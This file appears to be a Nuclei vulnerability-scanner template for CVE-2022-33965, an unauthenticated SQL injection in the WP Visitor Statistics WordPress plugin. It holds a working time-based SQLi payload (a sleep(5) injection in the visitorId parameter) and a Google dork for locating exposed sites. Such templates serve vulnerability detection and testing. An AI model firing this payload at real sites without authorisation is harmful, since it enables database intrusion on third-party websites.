nuclei-templates/cves/2022/CVE-2022-33965.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-10-10 06:07:38 +00:00
id: CVE-2022-33965
info:
2022-10-10 10:24:57 +00:00
name: WP Visitor Statistics (Real Time Traffic) < 5.8 - Unauthenticated SQLi
2022-10-10 06:07:38 +00:00
author: theamanrawat
severity: critical
description: |
Unauthenticated SQL Injection (SQLi) vulnerabilities in Osamaesh WP Visitor Statistics plugin <= 5.7 at WordPress.
reference:
- https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
- https://wordpress.org/plugins/wp-stats-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2022-33965
classification:
cve-id: CVE-2022-33965
metadata:
verified: true
2022-10-10 10:24:57 +00:00
google-dork: inurl:"/wp-content/plugins/wp-stats-manager"
tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager
2022-10-10 06:07:38 +00:00
requests:
- raw:
- |
@timeout: 15s
GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: word
part: body
words:
- "1331' and sleep(5) or '"
- type: word
part: header
words:
- 'text/html'
- type: status
status:
2022-10-10 10:24:57 +00:00
- 200